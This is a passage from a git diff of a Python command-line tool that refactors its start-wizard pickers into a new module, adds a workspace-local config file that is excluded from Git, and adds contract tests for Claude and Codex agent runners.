now?", default=True) + if not confirmed: + return None + + result = app_settings.apply_settings_change( + SettingsChangeRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=payload, + confirmed=confirmed, + ) + ) + message = handle_action_result(result) + refresh_view_model() + return message + + +def _sync_full( + console: Console, + context: SettingsContext, + repo_path: Path, + *, + handle_action_result: Callable[[SettingsActionResult], str | None], + refresh_view_model: Callable[[], None], +) -> str | None: + """Full sync: import then export.""" + console.print(f"[dim]Full sync with {repo_path}...[/dim]") + payload = ProfileSyncPayload(mode=ProfileSyncMode.FULL_SYNC, repo_path=repo_path) + result = app_settings.apply_settings_change( + SettingsChangeRequest( + action_id="profile_sync", + workspace=context.workspace, + payload=payload, + ) + ) + message = handle_action_result(result) + refresh_view_model() + return message + + +def render_profile_sync_result(console: Console, result: ProfileSyncResult) -> None: + """Render profile sync result.""" + lines: list[str] = [] + if result.mode == ProfileSyncMode.EXPORT: + lines.append(f"[green]✓ Exported {result.exported} profile(s)[/green]") + for profile_id in result.profile_ids: + lines.append(f" [green]+[/green] {profile_id}") + if result.warnings: + lines.append("") + for warning in result.warnings: + lines.append(f" [yellow]![/yellow] {warning}") + lines.append("") + lines.append("[dim]Files written locally · no git commit/push[/dim]") + lines.append("[dim]For git: scc profile export --repo PATH --commit --push[/dim]") + + if result.mode == ProfileSyncMode.IMPORT: + lines.append(f"[green]✓ Imported {result.imported} profile(s)[/green]") + if result.warnings: + lines.append("") + for warning in result.warnings: + lines.append(f" [yellow]![/yellow] {warning}") + lines.append("") + lines.append("[dim]Profiles copied locally · no git pull[/dim]") + lines.append("[dim]For git: scc profile import --repo PATH --pull[/dim]") + + if result.mode == ProfileSyncMode.FULL_SYNC: + lines.append("[green]✓ Sync complete[/green]") + lines.append("") + lines.append(f" Imported: {result.imported} profile(s)") + lines.append(f" Exported: {result.exported} profile(s)") + lines.append("") + lines.append("[dim]Files synced locally · no git operations[/dim]") + lines.append("[dim]For git: scc profile sync --repo PATH --pull --commit --push[/dim]") + + console.print() + console.print( + Panel( + "\n".join(lines), + title="[cyan]Sync[/cyan] Profiles", + border_style="bright_black", + box=box.ROUNDED, + padding=(1, 2), + ) + ) diff --git a/src/scc_cli/ui/wizard.py b/src/scc_cli/ui/wizard.py index 0afa12f..2b82e68 100644 --- a/src/scc_cli/ui/wizard.py +++ b/src/scc_cli/ui/wizard.py @@ -47,7 +47,7 @@ from rich.console import Console from scc_cli.application.interaction_requests import ConfirmRequest, InputRequest, SelectRequest -from scc_cli.application.launch.start_wizard import ( +from scc_cli.application.launch.start_wizard import ( # noqa: F401 CLONE_REPO_REQUEST_ID, CROSS_TEAM_RESUME_REQUEST_ID, CUSTOM_WORKSPACE_REQUEST_ID, @@ -62,7 +62,6 @@ QuickResumeViewModel, StartWizardPrompt, TeamOption, - TeamRepoOption, TeamRepoPickerViewModel, TeamSelectionViewModel, WorkspacePickerViewModel, @@ -73,10 +72,10 @@ ) from ..ports.session_models import SessionSummary -from ..services.workspace import has_project_markers, is_suspicious_directory -from .keys import BACK, _BackSentinel -from .list_screen import ListItem -from .picker import ( +from ..services.workspace import has_project_markers +from .keys import BACK +from .keys import _BackSentinel as _BackSentinel # noqa: F401 +from .picker import ( # noqa: F401 QuickResumeResult, TeamSwitchRequested, _run_single_select_picker, @@ -90,6 +89,14 @@ prompt_with_layout, ) from .time_format import format_relative_time_calendar +from .wizard_pickers import ( # noqa: F401 + _run_subscreen_picker, + build_workspace_source_options, + build_workspace_source_options_from_view_model, + pick_recent_workspace, + pick_team_repo, + pick_workspace_source, +) if TYPE_CHECKING: pass @@ -394,538 +401,16 @@ def render_start_wizard_prompt( # ═══════════════════════════════════════════════════════════════════════════════ -def build_workspace_source_options( - *, - has_team_repos: bool, - include_current_dir: bool = True, -) -> list[WorkspaceSourceOption]: - options: list[WorkspaceSourceOption] = [] - - if include_current_dir: - # Check current directory for project markers and git status - # Import here to avoid circular dependencies - from scc_cli.services import git as git_service - - cwd = Path.cwd() - cwd_name = cwd.name or str(cwd) - is_git = git_service.is_git_repo(cwd) - - # Three-tier logic with git awareness: - # 1. Suspicious directory (home, /, tmp) -> don't show - # 2. Has project markers + git -> show folder name (confident) - # 3. Has project markers, no git -> show "folder (no git)" - # 4. No markers, not suspicious -> show "folder (no git)" - if not is_suspicious_directory(cwd): - if _has_project_markers(cwd): - if is_git: - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.CURRENT_DIR, - label="• Current directory", - description=cwd_name, - ) - ) - else: - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.CURRENT_DIR, - label="• Current directory", - description=f"{cwd_name} (no git)", - ) - ) - else: - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.CURRENT_DIR, - label="• Current directory", - description=f"{cwd_name} (no git)", - ) - ) - - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.RECENT, - label="• Recent workspaces", - description="Continue working on previous project", - ) - ) - - if has_team_repos: - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.TEAM_REPOS, - label="• Team repositories", - description="Choose from team's common repos", - ) - ) - - options.extend( - [ - WorkspaceSourceOption( - source=WorkspaceSource.CUSTOM, - label="• Enter path", - description="Specify a local directory path", - ), - WorkspaceSourceOption( - source=WorkspaceSource.CLONE, - label="• Clone repository", - description="Clone a Git repository", - ), - ] - ) - - return options - - -def build_workspace_source_options_from_view_model( - view_model: WorkspaceSourceViewModel, -) -> list[WorkspaceSourceOption]: - """Build workspace source options from view model data flags. - - This function is called by the UI layer when the view model has empty - options. It builds presentation options based on the data flags - provided by the application layer (cwd_context, has_team_repos). - - The design follows clean architecture: - - Application layer provides data (cwd_context, has_team_repos) - - UI layer decides how to present that data (this function) - - Args: - view_model: WorkspaceSourceViewModel with data flags populated. - - Returns: - List of WorkspaceSourceOption for the picker. - """ - options: list[WorkspaceSourceOption] = [] - - # Current directory - only if cwd_context is provided (means it's not suspicious) - if view_model.cwd_context is not None: - ctx = view_model.cwd_context - # Format description based on git status - if ctx.is_git: - description = ctx.name - else: - description = f"{ctx.name} (no git)" - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.CURRENT_DIR, - label="• Current directory", - description=description, - ) - ) - - # Recent workspaces - always available - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.RECENT, - label="• Recent workspaces", - description="Continue working on previous project", - ) - ) - - # Team repositories - only if available - if view_model.has_team_repos: - options.append( - WorkspaceSourceOption( - source=WorkspaceSource.TEAM_REPOS, - label="• Team repositories", - description="Choose from team's common repos", - ) - ) - - # Enter path and Clone - always available - options.extend( - [ - WorkspaceSourceOption( - source=WorkspaceSource.CUSTOM, - label="• Enter path", - description="Specify a local directory path", - ), - WorkspaceSourceOption( - source=WorkspaceSource.CLONE, - label="• Clone repository", - description="Clone a Git repository", - ), - ] - ) - - return options - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Sub-screen Picker Wrapper -# ═══════════════════════════════════════════════════════════════════════════════ - - -def _run_subscreen_picker( - items: list[ListItem[T]], - title: str, - subtitle: str | None = None, - *, - standalone: bool = False, - context_label: str | None = None, -) -> T | _BackSentinel | None: - """Run picker for sub-screens with three-state return contract. - - Sub-screen pickers distinguish between: - - Esc (go back to previous screen) → BACK sentinel - - q (quit app entirely) → None - - Args: - items: List items to display (first item should be "← Back"). - title: Title for chrome header. - subtitle: Optional subtitle. - standalone: If True, dim the "t teams" hint (not available without org). - - Returns: - Selected item value, BACK if Esc pressed, or None if q pressed (quit). - """ - # Pass allow_back=True so picker distinguishes Esc (BACK) from q (None) - result = _run_single_select_picker( - items, - title=title, - subtitle=subtitle, - standalone=standalone, - allow_back=True, - context_label=context_label, - ) - # Three-state contract: - # - T value: user selected an item - # - BACK: user pressed Esc (go back) - # - None: user pressed q (quit app) - return result - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Top-Level Picker: Workspace Source -# ═══════════════════════════════════════════════════════════════════════════════ - - # ───────────────────────────────────────────────────────────────────────────── # Project Marker Detection (delegates to services layer) # ───────────────────────────────────────────────────────────────────────────── def _has_project_markers(path: Path) -> bool: - """Check if a directory has common project markers. - - Delegates to the service layer for the actual check. - This wrapper is kept for backwards compatibility with existing callers. - - Args: - path: Directory to check. - - Returns: - True if directory has any recognizable project markers. - """ + """Check if a directory has common project markers.""" return has_project_markers(path) def _is_valid_workspace(path: Path) -> bool: - """Check if a directory looks like a valid workspace. - - A valid workspace must have at least one of: - - .git directory or file (for worktrees) - - .scc.yaml config file - - Common project markers (package.json, pyproject.toml, etc.) - - Random directories (like $HOME) are NOT valid workspaces. - - Delegates to the service layer for the actual check. - - Args: - path: Directory to check. - - Returns: - True if directory exists and has workspace markers. - """ + """Check if a directory looks like a valid workspace.""" return has_project_markers(path) - - -def pick_workspace_source( - has_team_repos: bool = False, - team: str | None = None, - *, - standalone: bool = False, - allow_back: bool = False, - context_label: str | None = None, - include_current_dir: bool = True, - subtitle: str | None = None, - options: list[WorkspaceSourceOption] | None = None, - view_model: WorkspaceSourceViewModel | None = None, -) -> WorkspaceSource | _BackSentinel | None: - """Show picker for workspace source selection. - - Three-state return contract: - - Success: Returns WorkspaceSource (user selected an option) - - Back: Returns BACK sentinel (user pressed Esc, only if allow_back=True) - - Quit: Returns None (user pressed q) - - Args: - has_team_repos: Whether team repositories are available. - team: Current team name (used for context label if not provided). - standalone: If True, dim the "t teams" hint (not available without org). - allow_back: If True, Esc returns BACK (for sub-screen context like Dashboard). - If False, Esc returns None (for top-level CLI context). - context_label: Optional context label (e.g., "Team: platform") shown in header. - include_current_dir: Whether to include current directory as an option. - subtitle: Optional subtitle override. - options: Optional prebuilt workspace source options to render. - view_model: Optional view model with data flags (cwd_context, has_team_repos). - When provided with empty options, uses these flags to build options. - - Returns: - Selected WorkspaceSource, BACK if allow_back and Esc pressed, or None if quit. - """ - # Build subtitle based on context - resolved_subtitle = subtitle - if resolved_subtitle is None: - resolved_subtitle = "Pick a project source (press 't' to switch team)" - if options is not None: - resolved_subtitle = None - elif standalone: - resolved_subtitle = "Pick a project source" - resolved_context_label = context_label - if resolved_context_label is None and team: - resolved_context_label = f"Team: {team}" - - # Build items list - start with CWD option if appropriate - items: list[ListItem[WorkspaceSource]] = [] - - source_options = options - if not source_options: - # If view model is provided, build options from it - # This is the clean architecture approach: application provides data, - # UI layer builds presentation options - if view_model is not None: - source_options = build_workspace_source_options_from_view_model(view_model) - else: - # Fallback to original logic for backwards compatibility - # (when called without view_model from legacy code paths) - source_options = build_workspace_source_options( - has_team_repos=has_team_repos, - include_current_dir=include_current_dir, - ) - - for option in source_options: - items.append( - ListItem( - label=option.label, - description=option.description, - value=option.source, - ) - ) - - if allow_back: - result = _run_single_select_picker( - items=items, - title="Where is your project?", - subtitle=resolved_subtitle, - standalone=standalone, - allow_back=True, - context_label=resolved_context_label, - ) - else: - result = _run_single_select_picker( - items=items, - title="Where is your project?", - subtitle=resolved_subtitle, - standalone=standalone, - allow_back=False, - context_label=resolved_context_label, - ) - - if result is BACK: - return BACK - if result is None: - return None - if isinstance(result, WorkspaceSource): - return result - return None - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Sub-Screen Picker: Recent Workspaces -# ═══════════════════════════════════════════════════════════════════════════════ - - -def pick_recent_workspace( - recent: list[SessionSummary], - *, - standalone: bool = False, - context_label: str | None = None, - options: list[WorkspaceSummary] | None = None, -) -> str | _BackSentinel | None: - """Show picker for recent workspace selection. - - This is a sub-screen picker with three-state return contract: - - str: User selected a workspace path - - BACK: User pressed Esc (go back to previous screen) - - None: User pressed q (quit app entirely) - - Args: - recent: List of recent session summaries with workspace and last_used fields. - standalone: If True, dim the "t teams" hint (not available without org). - context_label: Optional context label (e.g., "Team: platform") shown in header. - options: Optional prebuilt workspace summaries to render. - - Returns: - Selected workspace path, BACK if Esc pressed, or None if q pressed (quit). - """ - # Build items with "← Back" first - items: list[ListItem[str | _BackSentinel]] = [ - ListItem( - label="← Back", - description="", - value=BACK, - ), - ] - - summaries = options or [] - if not summaries: - for session in recent: - workspace = session.workspace - last_used = session.last_used or "" - summaries.append( - WorkspaceSummary( - label=_normalize_path(workspace), - description=_format_relative_time(last_used), - workspace=workspace, - ) - ) - - # Add recent workspaces - for summary in summaries: - items.append( - ListItem( - label=summary.label, - description=summary.description, - value=summary.workspace, - ) - ) - - # Empty state hint in subtitle - if len(items) == 1: # Only "← Back" - subtitle = "No recent workspaces found" - else: - subtitle = None - - return _run_subscreen_picker( - items=items, - title="Recent Workspaces", - subtitle=subtitle, - standalone=standalone, - context_label=context_label, - ) - - -# ═══════════════════════════════════════════════════════════════════════════════ -# Sub-Screen Picker: Team Repositories (Phase 3) -# ═══════════════════════════════════════════════════════════════════════════════ - - -def pick_team_repo( - repos: list[dict[str, Any]], - workspace_base: str = "~/projects", - *, - standalone: bool = False, - context_label: str | None = None, - options: list[TeamRepoOption] | None = None, -) -> str | _BackSentinel | None: - """Show picker for team repository selection. - - This is a sub-screen picker with three-state return contract: - - str: User selected a repo (returns existing local_path or newly cloned path) - - BACK: User pressed Esc (go back to previous screen) - - None: User pressed q (quit app entirely) - - If the selected repo has a local_path that exists, returns that path. - Otherwise, clones the repository and returns the new path. - - Args: - repos: List of repo dicts with 'name', 'url', optional 'description', 'local_path'. - workspace_base: Base directory for cloning new repos. - standalone: If True, dim the "t teams" hint (not available without org). - context_label: Optional context label (e.g., "Team: platform") shown in header. - options: Optional prebuilt repo options to render. - - Returns: - Workspace path (existing or newly cloned), BACK if Esc pressed, or None if q pressed. - """ - # Build items with "← Back" first - items: list[ListItem[TeamRepoOption | _BackSentinel]] = [ - ListItem( - label="← Back", - description="", - value=BACK, - ), - ] - - resolved_options: list[TeamRepoOption] = list(options) if options is not None else [] - if not resolved_options: - for repo in repos: - resolved_options.append( - TeamRepoOption( - name=repo.get("name", repo.get("url", "Unknown")), - description=repo.get("description", ""), - url=repo.get("url"), - local_path=repo.get("local_path"), - ) - ) - - # Add team repos - for repo_option in resolved_options: - items.append( - ListItem( - label=repo_option.name, - description=repo_option.description, - value=repo_option, - ) - ) - - # Empty state hint - if len(items) == 1: # Only "← Back" - subtitle = "No team repositories configured" - else: - subtitle = None - - result = _run_subscreen_picker( - items=items, - title="Team Repositories", - subtitle=subtitle, - standalone=standalone, - context_label=context_label, - ) - - # Handle quit (q pressed) - if result is None: - return None - - # Handle BACK (Esc pressed) - if result is BACK: - return BACK - - # Need to clone - import here to avoid circular imports - from .git_interactive import clone_repo - - clone_handler = clone_repo - - # Handle repo selection - check for existing local path or clone - if isinstance(result, TeamRepoOption): - local_path = result.local_path - if local_path: - expanded = Path(local_path).expanduser() - if expanded.exists(): - return str(expanded) - - repo_url = result.url or "" - if repo_url: - cloned_path = clone_handler(repo_url, workspace_base) - if cloned_path: - return cloned_path - - # Cloning failed or no URL - return BACK to let user try again - return BACK - - # Shouldn't happen, but handle gracefully - return BACK diff --git a/src/scc_cli/ui/wizard_pickers.py b/src/scc_cli/ui/wizard_pickers.py new file mode 100644 index 0000000..8eec4b1 --- /dev/null +++ b/src/scc_cli/ui/wizard_pickers.py @@ -0,0 +1,443 @@ +"""Picker functions for the start wizard. + +Extracted from wizard.py: workspace source option builders and +sub-screen pickers (pick_workspace_source, pick_recent_workspace, +pick_team_repo). +""" + +from __future__ import annotations + +from pathlib import Path +from typing import TYPE_CHECKING, Any, TypeVar + +from scc_cli.application.launch.start_wizard import ( + TeamRepoOption, + WorkspaceSource, + WorkspaceSourceOption, + WorkspaceSourceViewModel, + WorkspaceSummary, +) + +from ..services.workspace import has_project_markers +from .keys import BACK, _BackSentinel +from .list_screen import ListItem + +if TYPE_CHECKING: + from ..ports.session_models import SessionSummary + +T = TypeVar("T") + + +def _get_picker() -> Any: + """Late-bound lookup of _run_single_select_picker through wizard module. + + Tests patch scc_cli.ui.wizard._run_single_select_picker, so we must + resolve through that module at call time for the mock to take effect. + """ + from . import wizard as _wizard_mod + + return _wizard_mod._run_single_select_picker + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Workspace Source Option Builders +# ═══════════════════════════════════════════════════════════════════════════════ + + +def build_workspace_source_options( + *, + has_team_repos: bool, + include_current_dir: bool = True, +) -> list[WorkspaceSourceOption]: + options: list[WorkspaceSourceOption] = [] + + if include_current_dir: + from scc_cli.services import git as git_service + + cwd = Path.cwd() + cwd_name = cwd.name or str(cwd) + is_git = git_service.is_git_repo(cwd) + + from ..services.workspace import is_suspicious_directory + + if not is_suspicious_directory(cwd): + if has_project_markers(cwd): + if is_git: + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.CURRENT_DIR, + label="• Current directory", + description=cwd_name, + ) + ) + else: + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.CURRENT_DIR, + label="• Current directory", + description=f"{cwd_name} (no git)", + ) + ) + else: + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.CURRENT_DIR, + label="• Current directory", + description=f"{cwd_name} (no git)", + ) + ) + + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.RECENT, + label="• Recent workspaces", + description="Continue working on previous project", + ) + ) + + if has_team_repos: + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.TEAM_REPOS, + label="• Team repositories", + description="Choose from team's common repos", + ) + ) + + options.extend( + [ + WorkspaceSourceOption( + source=WorkspaceSource.CUSTOM, + label="• Enter path", + description="Specify a local directory path", + ), + WorkspaceSourceOption( + source=WorkspaceSource.CLONE, + label="• Clone repository", + description="Clone a Git repository", + ), + ] + ) + + return options + + +def build_workspace_source_options_from_view_model( + view_model: WorkspaceSourceViewModel, +) -> list[WorkspaceSourceOption]: + """Build workspace source options from view model data flags. + + This function is called by the UI layer when the view model has empty + options. It builds presentation options based on the data flags + provided by the application layer (cwd_context, has_team_repos). + + The design follows clean architecture: + - Application layer provides data (cwd_context, has_team_repos) + - UI layer decides how to present that data (this function) + + Args: + view_model: WorkspaceSourceViewModel with data flags populated. + + Returns: + List of WorkspaceSourceOption for the picker. + """ + options: list[WorkspaceSourceOption] = [] + + if view_model.cwd_context is not None: + ctx = view_model.cwd_context + if ctx.is_git: + description = ctx.name + else: + description = f"{ctx.name} (no git)" + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.CURRENT_DIR, + label="• Current directory", + description=description, + ) + ) + + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.RECENT, + label="• Recent workspaces", + description="Continue working on previous project", + ) + ) + + if view_model.has_team_repos: + options.append( + WorkspaceSourceOption( + source=WorkspaceSource.TEAM_REPOS, + label="• Team repositories", + description="Choose from team's common repos", + ) + ) + + options.extend( + [ + WorkspaceSourceOption( + source=WorkspaceSource.CUSTOM, + label="• Enter path", + description="Specify a local directory path", + ), + WorkspaceSourceOption( + source=WorkspaceSource.CLONE, + label="• Clone repository", + description="Clone a Git repository", + ), + ] + ) + + return options + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Sub-screen Picker Wrapper +# ═══════════════════════════════════════════════════════════════════════════════ + + +def _run_subscreen_picker( + items: list[ListItem[T]], + title: str, + subtitle: str | None = None, + *, + standalone: bool = False, + context_label: str | None = None, +) -> T | _BackSentinel | None: + """Run picker for sub-screens with three-state return contract.""" + result: T | _BackSentinel | None = _get_picker()( + items, + title=title, + subtitle=subtitle, + standalone=standalone, + allow_back=True, + context_label=context_label, + ) + return result + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Top-Level Picker: Workspace Source +# ═══════════════════════════════════════════════════════════════════════════════ + + +def pick_workspace_source( + has_team_repos: bool = False, + team: str | None = None, + *, + standalone: bool = False, + allow_back: bool = False, + context_label: str | None = None, + include_current_dir: bool = True, + subtitle: str | None = None, + options: list[WorkspaceSourceOption] | None = None, + view_model: WorkspaceSourceViewModel | None = None, +) -> WorkspaceSource | _BackSentinel | None: + """Show picker for workspace source selection. + + Three-state return contract: + - Success: Returns WorkspaceSource (user selected an option) + - Back: Returns BACK sentinel (user pressed Esc, only if allow_back=True) + - Quit: Returns None (user pressed q) + """ + resolved_subtitle = subtitle + if resolved_subtitle is None: + resolved_subtitle = "Pick a project source (press 't' to switch team)" + if options is not None: + resolved_subtitle = None + elif standalone: + resolved_subtitle = "Pick a project source" + resolved_context_label = context_label + if resolved_context_label is None and team: + resolved_context_label = f"Team: {team}" + + items: list[ListItem[WorkspaceSource]] = [] + + source_options = options + if not source_options: + if view_model is not None: + source_options = build_workspace_source_options_from_view_model(view_model) + else: + source_options = build_workspace_source_options( + has_team_repos=has_team_repos, + include_current_dir=include_current_dir, + ) + + for option in source_options: + items.append( + ListItem( + label=option.label, + description=option.description, + value=option.source, + ) + ) + + if allow_back: + result = _get_picker()( + items=items, + title="Where is your project?", + subtitle=resolved_subtitle, + standalone=standalone, + allow_back=True, + context_label=resolved_context_label, + ) + else: + result = _get_picker()( + items=items, + title="Where is your project?", + subtitle=resolved_subtitle, + standalone=standalone, + allow_back=False, + context_label=resolved_context_label, + ) + + if result is BACK: + return BACK + if result is None: + return None + if isinstance(result, WorkspaceSource): + return result + return None + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Sub-Screen Picker: Recent Workspaces +# ═══════════════════════════════════════════════════════════════════════════════ + + +def pick_recent_workspace( + recent: list[SessionSummary], + *, + standalone: bool = False, + context_label: str | None = None, + options: list[WorkspaceSummary] | None = None, +) -> str | _BackSentinel | None: + """Show picker for recent workspace selection.""" + from .wizard import _format_relative_time, _normalize_path + + items: list[ListItem[str | _BackSentinel]] = [ + ListItem( + label="← Back", + description="", + value=BACK, + ), + ] + + summaries = options or [] + if not summaries: + for session in recent: + workspace = session.workspace + last_used = session.last_used or "" + summaries.append( + WorkspaceSummary( + label=_normalize_path(workspace), + description=_format_relative_time(last_used), + workspace=workspace, + ) + ) + + for summary in summaries: + items.append( + ListItem( + label=summary.label, + description=summary.description, + value=summary.workspace, + ) + ) + + if len(items) == 1: + subtitle = "No recent workspaces found" + else: + subtitle = None + + return _run_subscreen_picker( + items=items, + title="Recent Workspaces", + subtitle=subtitle, + standalone=standalone, + context_label=context_label, + ) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Sub-Screen Picker: Team Repositories +# ═══════════════════════════════════════════════════════════════════════════════ + + +def pick_team_repo( + repos: list[dict[str, Any]], + workspace_base: str = "~/projects", + *, + standalone: bool = False, + context_label: str | None = None, + options: list[TeamRepoOption] | None = None, +) -> str | _BackSentinel | None: + """Show picker for team repository selection.""" + items: list[ListItem[TeamRepoOption | _BackSentinel]] = [ + ListItem( + label="← Back", + description="", + value=BACK, + ), + ] + + resolved_options: list[TeamRepoOption] = list(options) if options is not None else [] + if not resolved_options: + for repo in repos: + resolved_options.append( + TeamRepoOption( + name=repo.get("name", repo.get("url", "Unknown")), + description=repo.get("description", ""), + url=repo.get("url"), + local_path=repo.get("local_path"), + ) + ) + + for repo_option in resolved_options: + items.append( + ListItem( + label=repo_option.name, + description=repo_option.description, + value=repo_option, + ) + ) + + if len(items) == 1: + subtitle = "No team repositories configured" + else: + subtitle = None + + result = _run_subscreen_picker( + items=items, + title="Team Repositories", + subtitle=subtitle, + standalone=standalone, + context_label=context_label, + ) + + if result is None: + return None + if result is BACK: + return BACK + + from .git_interactive import clone_repo + + clone_handler = clone_repo + + if isinstance(result, TeamRepoOption): + local_path = result.local_path + if local_path: + expanded = Path(local_path).expanduser() + if expanded.exists(): + return str(expanded) + + repo_url = result.url or "" + if repo_url: + cloned_path = clone_handler(repo_url, workspace_base) + if cloned_path: + return cloned_path + + return BACK + + return BACK diff --git a/src/scc_cli/workspace_local_config.py b/src/scc_cli/workspace_local_config.py new file mode 100644 index 0000000..c0efd7e --- /dev/null +++ b/src/scc_cli/workspace_local_config.py @@ -0,0 +1,115 @@ +"""Workspace-local config for per-checkout UX preferences. + +This file stores non-sensitive state under ``.scc/config.local.json`` inside a +workspace. The primary use is remembering the last provider used in that +workspace without leaking the preference into global config or version control. +""" + +from __future__ import annotations + +import json +import subprocess +import tempfile +from pathlib import Path +from typing import Any, cast + +WORKSPACE_CONFIG_DIRNAME = ".scc" +WORKSPACE_CONFIG_FILENAME = "config.local.json" +_GIT_EXCLUDE_PATTERN = f"{WORKSPACE_CONFIG_DIRNAME}/" + + +def get_workspace_local_config_path(workspace_root: str | Path) -> Path: + """Return the local SCC config path for a workspace root.""" + root = Path(workspace_root).expanduser() + return root / WORKSPACE_CONFIG_DIRNAME / WORKSPACE_CONFIG_FILENAME + + +def load_workspace_local_config(workspace_root: str | Path) -> dict[str, Any]: + """Load workspace-local config, returning an empty dict when absent.""" + path = get_workspace_local_config_path(workspace_root) + if not path.exists(): + return {} + with open(path, encoding="utf-8") as handle: + data = json.load(handle) + if not isinstance(data, dict): + return {} + return cast(dict[str, Any], data) + + +def save_workspace_local_config(workspace_root: str | Path, config: dict[str, Any]) -> None: + """Persist workspace-local config atomically.""" + path = get_workspace_local_config_path(workspace_root) + path.parent.mkdir(parents=True, exist_ok=True) + + with tempfile.NamedTemporaryFile( + mode="w", + dir=path.parent, + delete=False, + suffix=".tmp", + encoding="utf-8", + ) as tmp: + json.dump(config, tmp, indent=2) + tmp.write("\n") + tmp_path = Path(tmp.name) + tmp_path.chmod(0o600) + tmp_path.replace(path) + + +def get_workspace_last_used_provider(workspace_root: str | Path) -> str | None: + """Return the workspace-local last-used provider, if present.""" + config = load_workspace_local_config(workspace_root) + provider = config.get("last_used_provider") + return provider if isinstance(provider, str) else None + + +def set_workspace_last_used_provider(workspace_root: str | Path, provider_id: str) -> None: + """Persist the workspace-local last-used provider. + + Best-effort also appends ``.scc/`` to the effective Git exclude file so the + local config stays untracked without mutating the repository's tracked + ``.gitignore``. + """ + config = load_workspace_local_config(workspace_root) + config["last_used_provider"] = provider_id + save_workspace_local_config(workspace_root, config) + _ensure_workspace_local_config_excluded(Path(workspace_root)) + + +def _ensure_workspace_local_config_excluded(workspace_root: Path) -> None: + """Best-effort add ``.scc/`` to the effective Git exclude file.""" + try: + exclude_result = subprocess.run( + [ + "git", + "-C", + str(workspace_root), + "rev-parse", + "--git-path", + "info/exclude", + ], + capture_output=True, + check=False, + text=True, + timeout=5, + ) + except (OSError, subprocess.TimeoutExpired): + return + + if exclude_result.returncode != 0: + return + + exclude_path = Path(exclude_result.stdout.strip()) + if not exclude_path.is_absolute(): + exclude_path = workspace_root / exclude_path + + try: + exclude_path.parent.mkdir(parents=True, exist_ok=True) + if exclude_path.exists(): + existing = exclude_path.read_text(encoding="utf-8").splitlines() + else: + existing = [] + if _GIT_EXCLUDE_PATTERN not in existing: + with open(exclude_path, "a", encoding="utf-8") as handle: + handle.write(f"{_GIT_EXCLUDE_PATTERN}\n") + except OSError: + return diff --git a/tests/conftest.py b/tests/conftest.py index 076ef09..cb9c786 100644 --- a/tests/conftest.py +++ b/tests/conftest.py @@ -10,6 +10,7 @@ from scc_cli.application.worktree import WorktreeDependencies from scc_cli.ports.dependency_installer import DependencyInstallResult +from tests.fakes import build_fake_adapters # ═══════════════════════════════════════════════════════════════════════════════ # Path Fixtures @@ -211,13 +212,17 @@ def worktree_dependencies(): git_client=git_client, dependency_installer=dependency_installer, ) + base_adapters = build_fake_adapters() adapters = SimpleNamespace( - filesystem=MagicMock(), - remote_fetcher=MagicMock(), - clock=MagicMock(), + filesystem=base_adapters.filesystem, + remote_fetcher=base_adapters.remote_fetcher, + clock=base_adapters.clock, git_client=git_client, - agent_runner=MagicMock(), - sandbox_runtime=MagicMock(), + agent_runner=base_adapters.agent_runner, + agent_provider=base_adapters.agent_provider, + audit_event_sink=base_adapters.audit_event_sink, + sandbox_runtime=base_adapters.sandbox_runtime, dependency_installer=dependency_installer, + personal_profile_service=base_adapters.personal_profile_service, ) return dependencies, adapters diff --git a/tests/contracts/test_agent_runner_contract.py b/tests/contracts/test_agent_runner_contract.py index 59fafc1..b2ca8f3 100644 --- a/tests/contracts/test_agent_runner_contract.py +++ b/tests/contracts/test_agent_runner_contract.py @@ -4,7 +4,11 @@ from pathlib import Path +import pytest + from scc_cli.adapters.claude_agent_runner import ClaudeAgentRunner +from scc_cli.adapters.codex_agent_runner import CodexAgentRunner +from scc_cli.ports.agent_runner import AgentRunner def test_agent_runner_builds_settings_and_command() -> None: @@ -15,7 +19,85 @@ def test_agent_runner_builds_settings_and_command() -> None: settings = runner.build_settings(payload, path=settings_path) command = runner.build_command(settings) - assert settings.content == payload + assert isinstance(settings.rendered_bytes, bytes) assert settings.path == settings_path + assert settings.suffix == ".json" assert command.argv[0] == "claude" assert runner.describe() + + +# --------------------------------------------------------------------------- +# Parametric contract: every AgentRunner satisfies the protocol shape +# --------------------------------------------------------------------------- + +_RUNNERS: list[tuple[str, AgentRunner, str, Path]] = [ + ( + "claude", + ClaudeAgentRunner(), + "claude", + Path("/home/agent/.claude/settings.json"), + ), + ( + "codex", + CodexAgentRunner(), + "codex", + Path("/home/agent/.codex/config.toml"), + ), +] + + +@pytest.mark.parametrize( + ("label", "runner", "expected_argv0", "expected_settings_path"), + _RUNNERS, + ids=[r[0] for r in _RUNNERS], +) +class TestAgentRunnerContract: + """Every AgentRunner must satisfy the same structural contract.""" + + def test_build_settings_produces_rendered_bytes( + self, + label: str, + runner: AgentRunner, + expected_argv0: str, + expected_settings_path: Path, + ) -> None: + settings = runner.build_settings({"key": "val"}, path=expected_settings_path) + assert isinstance(settings.rendered_bytes, bytes) + assert len(settings.rendered_bytes) > 0 + assert settings.path == expected_settings_path + assert settings.suffix in (".json", ".toml") + + def test_build_command_returns_expected_argv( + self, + label: str, + runner: AgentRunner, + expected_argv0: str, + expected_settings_path: Path, + ) -> None: + settings = runner.build_settings({}, path=expected_settings_path) + command = runner.build_command(settings) + assert command.argv[0] == expected_argv0 + assert isinstance(command.env, dict) + + def test_describe_returns_non_empty_string( + self, + label: str, + runner: AgentRunner, + expected_argv0: str, + expected_settings_path: 